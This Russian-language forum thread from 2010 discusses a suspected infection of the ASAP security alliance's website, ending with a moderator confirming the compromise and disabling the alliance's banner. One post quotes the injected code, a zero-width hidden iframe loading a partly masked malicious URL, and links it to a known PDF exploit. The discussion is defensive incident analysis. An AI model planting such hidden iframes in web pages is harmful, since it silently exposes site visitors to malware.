-
ASAP заражён?!
престижное объединение индивидуальных экспертов и ресурсов, имеющих непосредственное отношение к Интернет-безопасности
Престижный альянс ASAP (Alliance of Security Analysis Professionals, Альянс профессионалов в области анализа безопасности) заражён?
Последний раз редактировалось ALEX(XX); 14.08.2010 в 20:45.
Причина: ссылку деактивировали
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Спасибо за сигнал, мы будем разбираться в ситуации. Вероятнее всего, произошло ложное срабатывание.
[I]Nick Golovko
NCFU lecturer, information security specialist[/I]
-
LLG, а может, это зловред дописывает что-то "левое" правее к адресу?
-
А где тут вирус?
Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> -->
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="1.9">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE></TITLE>
</HEAD>
<BODY><P></BODY>
</HTML>
там вроде упаковано gzip-пом это
Последний раз редактировалось valho; 13.08.2010 в 21:28.
Причина: добавлено
-
-
NickGolovko, если ложное срабатывание, то почему форум ASAP закрыт, а при активации ссылки сразу алерт касперского?
плюс продолжается это всё уже с 11 августа....
valho,
Код:
<iframe src='хттп://forums.maddoktor2.com/H****/exem***com/' width='0' height='0' frameborder='0'></iframe>
-
Не обратил внимание на этот сайт exem***com
Вот это получается было http://www.securelist.com/en/descrip...t.JS.Pdfka.chq судя по сообщению из кэша
Последний раз редактировалось valho; 13.08.2010 в 22:20.
Причина: удалил ссылку
-
-
Большому кораблю - большая торпеда!
Left home for a few days and look what happens...
-
-
Не зря всё таки советуют отключать iframe в браузере .
-
Похоже, что инфекция действительно присутствует. Баннер ASAP отключен до окончательного выяснения обстоятельств.
Напоминаем: если вы столкнулись с возможным заражением на ресурсе, с которым мы состоим в каких-либо отношениях, не забывайте незамедлительно об этом сообщать - у участников административной команды нет сверхъестественных способностей, и поэтому мы не можем уследить сразу за всем.
[I]Nick Golovko
NCFU lecturer, information security specialist[/I]
-
NickGolovko, возникает только один вопрос: почему же ресурс-партнёр, зная о заражении и состоящий из профессионалов, не удосужился известить остальных о своих проблемах и минимализировать риск заражения пользователей...
Последний раз редактировалось anton_dr; 14.08.2010 в 22:03.
Причина: Не ройте себе яму
-
Точный ответ на ваш вопрос нам пока не известен.
Добавлено через 7 часов 20 минут
Итак, наши зарубежные коллеги окончательно подтвердили, что обсуждаемый ресурс был поражен. Особо отмечено, что в последние месяцы многие англоязычные ресурсы в сфере безопасности подвергались атакам; в ряде случаев злоумышленникам удалось проэксплуатировать уязвимости программного обеспечения даже на крупнейших сайтах в этом секторе. Что касается собственно сайта ASAP, то связаться с его основателем, который является единственным привилегированным администратором, не удается, так что перспективы дезинфекции остаются туманными. Баннер Альянса, таким образом, останется отключенным до тех пор, пока посещение обсуждаемого ресурса не станет вновь безопасным.
Последний раз редактировалось NickGolovko; 14.08.2010 в 21:56.
Причина: Добавлено
[I]Nick Golovko
NCFU lecturer, information security specialist[/I]